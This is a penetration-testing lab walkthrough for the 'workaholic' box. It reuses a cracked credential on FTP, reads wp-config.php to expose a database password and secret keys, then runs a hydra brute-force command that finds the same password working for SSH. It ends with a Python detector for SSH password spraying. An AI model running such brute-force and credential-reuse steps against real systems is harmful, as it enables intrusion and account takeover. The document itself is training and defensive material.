FTP


Nmap discovered an FTP server on port 21 of the 192.168.136.229 host. The running service is vsftpd 3.0.5.

Null Session


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/workaholic]
└─$ ftp $IP         
Connected to 192.168.136.229.
220 (vsFTPd 3.0.5)
Name (192.168.136.229:kali): 
331 Please specify the password.
Password: 
530 Login incorrect.
ftp: Login failed
ftp> ^D
221 Goodbye.
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/workaholic]
└─$ ftp ftp@$IP
Connected to 192.168.136.229.
220 (vsFTPd 3.0.5)
331 Please specify the password.
Password: 
530 Login incorrect.
ftp: Login failed
ftp> ^D
221 Goodbye.
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/workaholic]
└─$ ftp anonymous@$IP         
Connected to 192.168.136.229.
220 (vsFTPd 3.0.5)
331 Please specify the password.
Password: 
530 Login incorrect.
ftp: Login failed
ftp> ^D
221 Goodbye.

The target FTP server does not allow anonymous access. A valid credential is required to proceed further.

ted Session


The credential of the ted user was exfiltrated through the SQL injection attack and cracked. The same credential is also valid for the target FTP server.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/workaholic]
└─$ ftp ted@$IP                  
Connected to 192.168.136.229.
220 (vsFTPd 3.0.5)
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> rstatus
211-FTP server status:
     Connected to 192.168.45.182
     Logged in as ted
     TYPE: ASCII
     No session bandwidth limit
     Session timeout in seconds is 300
     Control connection is plain text
     Data connections will be plain text
     At session startup, client count was 1
     vsFTPd 3.0.5 - secure, fast, stable
211 End of status

Session established

WordPress Webroot


ftp> passive
Passive mode: off; fallback to active mode: off.
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
-rwxr-xr-x    1 1002     1002          405 Mar 27 11:15 index.php
-rwxr-xr-x    1 1002     1002        19915 Mar 27 11:15 license.txt
-rwxr-xr-x    1 1002     1002         7409 Mar 27 11:15 readme.html
-rwxr-xr-x    1 1002     1002         7387 Mar 27 11:15 wp-activate.php
drwxr-xr-x    9 1002     1002         4096 Mar 27 11:15 wp-admin
-rwxr-xr-x    1 1002     1002          351 Mar 27 11:15 wp-blog-header.php
-rwxr-xr-x    1 1002     1002         2323 Mar 27 11:15 wp-comments-post.php
-rwxr-xr-x    1 1002     1002         3336 Mar 27 11:15 wp-config-sample.php
-rwxr-xr-x    1 1002     1002         3178 Mar 27 11:15 wp-config.php
drwxr-xr-x    5 1002     1002         4096 Mar 27 11:15 wp-content
-rwxr-xr-x    1 1002     1002         5617 Mar 27 11:15 wp-cron.php
drwxr-xr-x   30 1002     1002        12288 Mar 27 11:15 wp-includes
-rwxr-xr-x    1 1002     1002         2502 Mar 27 11:15 wp-links-opml.php
-rwxr-xr-x    1 1002     1002         3937 Mar 27 11:15 wp-load.php
-rwxr-xr-x    1 1002     1002        51367 Mar 27 11:15 wp-login.php
-rwxr-xr-x    1 1002     1002         8543 Mar 27 11:15 wp-mail.php
-rwxr-xr-x    1 1002     1002        29032 Mar 27 11:15 wp-settings.php
-rwxr-xr-x    1 1002     1002        34385 Mar 27 11:15 wp-signup.php
-rwxr-xr-x    1 1002     1002         5102 Mar 27 11:15 wp-trackback.php
-rwxr-xr-x    1 1002     1002         3246 Mar 27 11:15 xmlrpc.php
226 Directory send OK.

The target FTP server is mirroring the web root directory of the target WordPress instance.

Write Access


ftp> put test 
local: test remote: test
200 EPRT command successful. Consider using EPSV.
550 Permission denied.

Write access is not granted

wp-config.php

ftp> more wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the web site, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */
 
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
 
/** MySQL database username */
define( 'DB_USER', 'wpadmin' );
 
/** MySQL database password */
define( 'DB_PASSWORD', 'rU)tJnTw5*ShDt4nOx' );
 
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
 
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
 
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
 
/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         '%|X7>+ujGW6aeD,T5$V,SdIJ4=G>Wx(,^W|U$)Zb[/3)-*[W:EK+AHH/V Zl?A+8');
define('SECURE_AUTH_KEY',  'lwvqDQt{~|2>9fSbs;^bt,wb+;<lXAr+P@R*/jS}-dqgG]Frb|0_&~!,`||=/o!w');
define('LOGGED_IN_KEY',    '~}m3syWu?K6{s}b`bRn|jf%*z.R<Uoi+RTH65i!y&Wi V)w=B3EzHf %j,+I41|o');
define('NONCE_KEY',        'n _Ay4Rxg&?HxS(WqfU&:-gbl$^~+!7V9@NQb%-{K[}d/i~+`U-1(fN8xb$47]mC');
define('AUTH_SALT',        'pEd>^-5$.Tu=H6(d_E]{6sTF_k!lSEztv,-zhzzPc<yPQqX1c;~irIHpKjj5ZxIE');
define('SECURE_AUTH_SALT', 'AjBwd3Sl{F0+C+3Ma~S9s3fG=-W?mt?x+3Z_3+2&.LCs|!n pX5|ta56$[0-t>bw');
define('LOGGED_IN_SALT',   ' :+Wl:8U!Jyd2zc wEqYKG}Ug?bQ!b$|_:ktrzixd-<,$]9Vl@($5+Gc9Xvx.(Gm');
define('NONCE_SALT',       'i#u-MwU.K;n-.,;GoISHB|l6,{p::ucK!XOUBq)vXj`^>=9 ;Z<[<nNhvvM(}-u~');
 
/**#@-*/
 
/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';
 
/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define('WP_DEBUG', false );
 
 
/* Add any custom values between this line and the "stop editing" line. */
 
 
 
/* That's all, stop editing! Happy publishing. */
 
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}
 
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';

DB credential identified; wpadmin:rU)tJnTw5*ShDt4nOx

Password Reuse


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/workaholic]
└─$ hydra -L ./users.txt -P ./passwords.txt -I -t 64 ssh://$IP
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-06-27 17:16:14
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 12 tasks per 1 server, overall 12 tasks, 12 login tries (l:4/p:3), ~1 try per task
[DATA] attacking ssh://192.168.136.229:22/
[22][ssh] host: 192.168.136.229   login: charlie   password: rU)tJnTw5*ShDt4nOx
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-06-27 17:16:21

The DB password, rU)tJnTw5*ShDt4nOx, also belongs to the charlie user for SSH access.
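
From the defending side, the run above is 12 password attempts across 4 usernames in about 7 seconds, ending in one accepted login, and that pattern is visible in the sshd authentication log. The following is an added example, not part of the original notes: a small detector for that pattern. The log lines, hostname, usernames other than ted, wpadmin and charlie, and the thresholds are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd log lines (not from the page): one source failing against
# several accounts within seconds, then a success; plus one benign typo login.
SAMPLE_LOG = """\
Jun 27 17:16:15 web sshd[2101]: Failed password for ted from 192.168.45.182 port 40110 ssh2
Jun 27 17:16:15 web sshd[2102]: Failed password for invalid user wpadmin from 192.168.45.182 port 40112 ssh2
Jun 27 17:16:16 web sshd[2103]: Failed password for charlie from 192.168.45.182 port 40114 ssh2
Jun 27 17:16:16 web sshd[2104]: Failed password for root from 192.168.45.182 port 40116 ssh2
Jun 27 17:16:17 web sshd[2105]: Failed password for ted from 192.168.45.182 port 40118 ssh2
Jun 27 17:16:19 web sshd[2107]: Accepted password for charlie from 192.168.45.182 port 40122 ssh2
Jun 27 17:20:01 web sshd[2110]: Failed password for alice from 10.0.0.5 port 51000 ssh2
Jun 27 17:20:09 web sshd[2111]: Accepted password for alice from 10.0.0.5 port 51002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port \d+")

def parse(log, year=2025):
    """Yield (time, source, user, accepted) per password event; syslog omits the year."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["src"], m["user"], m["result"] == "Accepted"

def detect_spray(log, window=timedelta(seconds=60), min_failures=5, min_users=3):
    """Return {source: finding} for sources failing against many accounts in one window."""
    recent = defaultdict(list)  # source -> [(time, user)] failures still inside the window
    findings = {}
    for ts, src, user, accepted in sorted(parse(log)):
        recent[src] = [(t, u) for t, u in recent[src] if ts - t <= window]
        if not accepted:
            recent[src].append((ts, user))
        users = {u for _, u in recent[src]}
        if len(recent[src]) >= min_failures and len(users) >= min_users:
            f = findings.setdefault(src, {"failures": 0, "users": set(), "compromised": set()})
            f["failures"] = max(f["failures"], len(recent[src]))
            f["users"] |= users
            if accepted:  # a login that succeeds mid-spray is the account to reset first
                f["compromised"].add(user)
    return findings

if __name__ == "__main__":
    print(detect_spray(SAMPLE_LOG))
```

The single mistyped password from 10.0.0.5 is not flagged, because it stays below both the failure count and the distinct-user threshold.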